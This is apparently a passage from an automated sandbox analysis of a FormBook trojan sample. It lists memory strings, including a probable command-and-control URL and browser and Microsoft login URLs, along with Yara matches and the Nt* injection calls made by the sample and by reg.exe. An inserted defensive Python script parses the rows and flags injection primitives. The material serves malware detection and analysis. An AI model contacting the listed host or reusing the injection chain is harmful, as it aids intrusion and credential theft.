            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: DAGiwzvTYsMjq.exe, 00000017.00000002.4131641803.0000000005509000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jleabres.com
            Source: DAGiwzvTYsMjq.exe, 00000017.00000002.4131641803.0000000005509000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jleabres.com/blhi/
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: reg.exe, 00000011.00000002.4128479477.00000000030C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: reg.exe, 00000011.00000002.4128479477.00000000030C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: reg.exe, 00000011.00000002.4128479477.00000000030C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: reg.exe, 00000011.00000002.4128479477.000000000309E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033g
            Source: reg.exe, 00000011.00000002.4128479477.000000000309E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: reg.exe, 00000011.00000003.2042624632.0000000008030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: reg.exe, 00000011.00000002.4132806366.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: reg.exe, 00000011.00000002.4130930355.000000000520C000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.000000000473C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
            Source: reg.exe, 00000011.00000002.4130930355.000000000520C000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.000000000473C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
            Source: reg.exe, 00000011.00000002.4132621406.00000000065E0000.00000004.00000800.00020000.00000000.sdmp, reg.exe, 00000011.00000002.4130930355.00000000040C6000.00000004.10000000.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000017.00000002.4129787142.00000000035F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

            E-Banking Fraud

            Source: Yara matchFile source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0042B7C3 NtClose,8_2_0042B7C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2B60 NtClose,LdrInitializeThunk,8_2_017E2B60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_017E2DF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_017E2C70
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E35C0 NtCreateMutant,LdrInitializeThunk,8_2_017E35C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E4340 NtSetContextThread,8_2_017E4340
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E4650 NtSuspendThread,8_2_017E4650
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2BF0 NtAllocateVirtualMemory,8_2_017E2BF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2BE0 NtQueryValueKey,8_2_017E2BE0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2BA0 NtEnumerateValueKey,8_2_017E2BA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2B80 NtQueryInformationFile,8_2_017E2B80
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2AF0 NtWriteFile,8_2_017E2AF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2AD0 NtReadFile,8_2_017E2AD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2AB0 NtWaitForSingleObject,8_2_017E2AB0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2D30 NtUnmapViewOfSection,8_2_017E2D30
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2D10 NtMapViewOfSection,8_2_017E2D10
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2D00 NtSetInformationFile,8_2_017E2D00
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2DD0 NtDelayExecution,8_2_017E2DD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2DB0 NtEnumerateKey,8_2_017E2DB0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2C60 NtCreateKey,8_2_017E2C60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2C00 NtQueryInformationProcess,8_2_017E2C00
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2CF0 NtOpenProcess,8_2_017E2CF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2CC0 NtQueryVirtualMemory,8_2_017E2CC0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2CA0 NtQueryInformationToken,8_2_017E2CA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2F60 NtCreateProcessEx,8_2_017E2F60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2F30 NtCreateSection,8_2_017E2F30
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2FE0 NtCreateFile,8_2_017E2FE0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2FB0 NtResumeThread,8_2_017E2FB0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2FA0 NtQuerySection,8_2_017E2FA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2F90 NtProtectVirtualMemory,8_2_017E2F90
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2E30 NtWriteVirtualMemory,8_2_017E2E30
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2EE0 NtQueueApcThread,8_2_017E2EE0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2EA0 NtAdjustPrivilegesToken,8_2_017E2EA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2E80 NtReadVirtualMemory,8_2_017E2E80
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E3010 NtOpenDirectoryObject,8_2_017E3010
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E3090 NtSetValueKey,8_2_017E3090
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E39B0 NtGetContextThread,8_2_017E39B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E3D70 NtOpenThread,8_2_017E3D70
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E3D10 NtOpenProcessToken,8_2_017E3D10
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03594340 NtSetContextThread,LdrInitializeThunk,17_2_03594340
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03594650 NtSuspendThread,LdrInitializeThunk,17_2_03594650
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592B60 NtClose,LdrInitializeThunk,17_2_03592B60
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592BF0 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_03592BF0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592BE0 NtQueryValueKey,LdrInitializeThunk,17_2_03592BE0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592BA0 NtEnumerateValueKey,LdrInitializeThunk,17_2_03592BA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592AD0 NtReadFile,LdrInitializeThunk,17_2_03592AD0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592AF0 NtWriteFile,LdrInitializeThunk,17_2_03592AF0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592F30 NtCreateSection,LdrInitializeThunk,17_2_03592F30
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592FE0 NtCreateFile,LdrInitializeThunk,17_2_03592FE0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592FB0 NtResumeThread,LdrInitializeThunk,17_2_03592FB0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592EE0 NtQueueApcThread,LdrInitializeThunk,17_2_03592EE0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592E80 NtReadVirtualMemory,LdrInitializeThunk,17_2_03592E80
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592D10 NtMapViewOfSection,LdrInitializeThunk,17_2_03592D10
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592D30 NtUnmapViewOfSection,LdrInitializeThunk,17_2_03592D30
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592DD0 NtDelayExecution,LdrInitializeThunk,17_2_03592DD0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592DF0 NtQuerySystemInformation,LdrInitializeThunk,17_2_03592DF0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592C70 NtFreeVirtualMemory,LdrInitializeThunk,17_2_03592C70
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592C60 NtCreateKey,LdrInitializeThunk,17_2_03592C60
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592CA0 NtQueryInformationToken,LdrInitializeThunk,17_2_03592CA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035935C0 NtCreateMutant,LdrInitializeThunk,17_2_035935C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035939B0 NtGetContextThread,LdrInitializeThunk,17_2_035939B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592B80 NtQueryInformationFile,17_2_03592B80
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592AB0 NtWaitForSingleObject,17_2_03592AB0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592F60 NtCreateProcessEx,17_2_03592F60
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592F90 NtProtectVirtualMemory,17_2_03592F90
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592FA0 NtQuerySection,17_2_03592FA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592E30 NtWriteVirtualMemory,17_2_03592E30
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592EA0 NtAdjustPrivilegesToken,17_2_03592EA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592D00 NtSetInformationFile,17_2_03592D00
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592DB0 NtEnumerateKey,17_2_03592DB0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592C00 NtQueryInformationProcess,17_2_03592C00
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592CC0 NtQueryVirtualMemory,17_2_03592CC0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592CF0 NtOpenProcess,17_2_03592CF0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03593010 NtOpenDirectoryObject,17_2_03593010
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03593090 NtSetValueKey,17_2_03593090
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03593D70 NtOpenThread,17_2_03593D70
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03593D10 NtOpenProcessToken,17_2_03593D10
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF8250 NtClose,17_2_02CF8250
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF83B0 NtAllocateVirtualMemory,17_2_02CF83B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF80C0 NtReadFile,17_2_02CF80C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF81B0 NtDeleteFile,17_2_02CF81B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF7F60 NtCreateFile,17_2_02CF7F60
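The Nt* rows above show the complete process-injection set (NtCreateProcessEx, NtMapViewOfSection/NtUnmapViewOfSection, NtWriteVirtualMemory, NtQueueApcThread, NtSetContextThread, NtResumeThread) in two processes: the sample itself (process 8, wrappers at 0x017E2xxx) and reg.exe (process 17, wrappers at 0x03592xxx). Those addresses are not where ntdll is normally mapped; FormBook is known to call the system-call stubs from its own in-memory copy of ntdll, and a Windows utility such as reg.exe exposing them is the injected host rather than the origin. The script below is an added example by the editor, not part of the report. It parses rows in the report's `Source: ...Code function: ...` format, groups the Nt* calls per process index, converts that index to the hex prefix used by the memory-dump names (17 -> 00000011, the dump that matched Windows_Trojan_Formbook_1112e116 above) and flags processes whose call set covers the injection primitives, noting when the host is a Windows system binary. The embedded rows are a verbatim subset of the list above; `INJECTION_PRIMITIVES` and the `min_hits` threshold are the editor's choices, not a Joe Sandbox rule.

```python
import re
from collections import defaultdict

# Rows copied verbatim from the code-function list above (a subset of it).
REPORT_ROWS = [
    r"Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0042B7C3 NtClose,8_2_0042B7C3",
    r"Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E4340 NtSetContextThread,8_2_017E4340",
    r"Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2D10 NtMapViewOfSection,8_2_017E2D10",
    r"Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2D30 NtUnmapViewOfSection,8_2_017E2D30",
    r"Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2F60 NtCreateProcessEx,8_2_017E2F60",
    r"Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2E30 NtWriteVirtualMemory,8_2_017E2E30",
    r"Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2EE0 NtQueueApcThread,8_2_017E2EE0",
    r"Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2FB0 NtResumeThread,8_2_017E2FB0",
    r"Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004028408_2_00402840",
    r"Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03594340 NtSetContextThread,LdrInitializeThunk,17_2_03594340",
    r"Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592EE0 NtQueueApcThread,LdrInitializeThunk,17_2_03592EE0",
    r"Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592D10 NtMapViewOfSection,LdrInitializeThunk,17_2_03592D10",
    r"Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592F60 NtCreateProcessEx,17_2_03592F60",
    r"Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03592E30 NtWriteVirtualMemory,17_2_03592E30",
    r"Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF8250 NtClose,17_2_02CF8250",
    r"Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CF81B0 NtDeleteFile,17_2_02CF81B0",
]

# Editor's grouping (assumption, not a report rule): the NT calls that together
# make up a process-injection toolkit (remote process/section creation, memory
# write, thread context hijack, APC queueing).
INJECTION_PRIMITIVES = frozenset({
    "NtOpenProcess", "NtOpenThread", "NtCreateProcessEx", "NtCreateSection",
    "NtMapViewOfSection", "NtUnmapViewOfSection", "NtAllocateVirtualMemory",
    "NtProtectVirtualMemory", "NtWriteVirtualMemory", "NtQueueApcThread",
    "NtGetContextThread", "NtSetContextThread", "NtSuspendThread", "NtResumeThread",
})

# <image path> is glued to "Code function:" in the report; the function id is
# <process index>_<run>_<8 hex digit address>, and it is repeated at the end of the row.
ROW_RE = re.compile(
    r"Source:\s*(?P<image>.+?)Code function:\s*"
    r"(?P<fid>(?P<proc>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{8}))(?P<rest>.*)$"
)
FID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")


def parse_row(row):
    """Split one row; rows whose two ids are glued (no API list) yield apis == []."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    apis = [t for t in m["rest"].strip().split(",") if t and not FID_RE.match(t)]
    return {"image": m["image"], "proc": int(m["proc"]),
            "addr": int(m["addr"], 16), "apis": apis}


def dump_prefix(proc):
    """Process index as it appears in memory-dump names (17 -> '00000011')."""
    return f"{proc:08X}"


def summarize(rows):
    """Per process index: image, Nt* calls seen and the 64 KiB regions holding the wrappers."""
    per = defaultdict(lambda: {"image": None, "syscalls": set(), "stub_regions": set()})
    for row in rows:
        rec = parse_row(row)
        if rec is None:
            continue
        p = per[rec["proc"]]
        p["image"] = rec["image"]
        nt_calls = [a for a in rec["apis"] if a.startswith("Nt")]
        p["syscalls"].update(nt_calls)
        if nt_calls:
            p["stub_regions"].add(rec["addr"] & ~0xFFFF)
    return dict(per)


def injection_verdict(summary, min_hits=4):
    """Flag processes whose Nt* set covers at least min_hits injection primitives."""
    verdict = {}
    for proc, p in summary.items():
        hits = sorted(p["syscalls"] & INJECTION_PRIMITIVES)
        verdict[proc] = {
            "image": p["image"],
            "dump": dump_prefix(proc),
            "hits": hits,
            "flag": len(hits) >= min_hits,
            # A Windows utility hosting these wrappers is the injected party.
            "system_binary": (p["image"] or "").lower().startswith("c:\\windows\\"),
        }
    return verdict


if __name__ == "__main__":
    for proc, v in sorted(injection_verdict(summarize(REPORT_ROWS)).items()):
        tag = "INJECTION" if v["flag"] else "ok"
        host = " [system binary]" if v["system_binary"] else ""
        print(f"proc {proc} ({v['dump']}) {v['image']}: {tag}{host} {', '.join(v['hits'])}")
```

Feeding it the full row list above reproduces the report's own picture: process 8 and process 17 both carry the complete injection set, and only 17 is a system binary. The `00000011` prefix it prints for reg.exe is the one to look for in the Yara and memory-dump rows when pivoting from a process to its dumped regions.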
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 0_2_00CDD5BC 0_2_00CDD5BC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00402840 8_2_00402840
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0040107A 8_2_0040107A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00401080 8_2_00401080
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00401250 8_2_00401250
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004102E3 8_2_004102E3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004032F0 8_2_004032F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00402340 8_2_00402340
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0040233C 8_2_0040233C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00416C1E 8_2_00416C1E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0042DC23 8_2_0042DC23
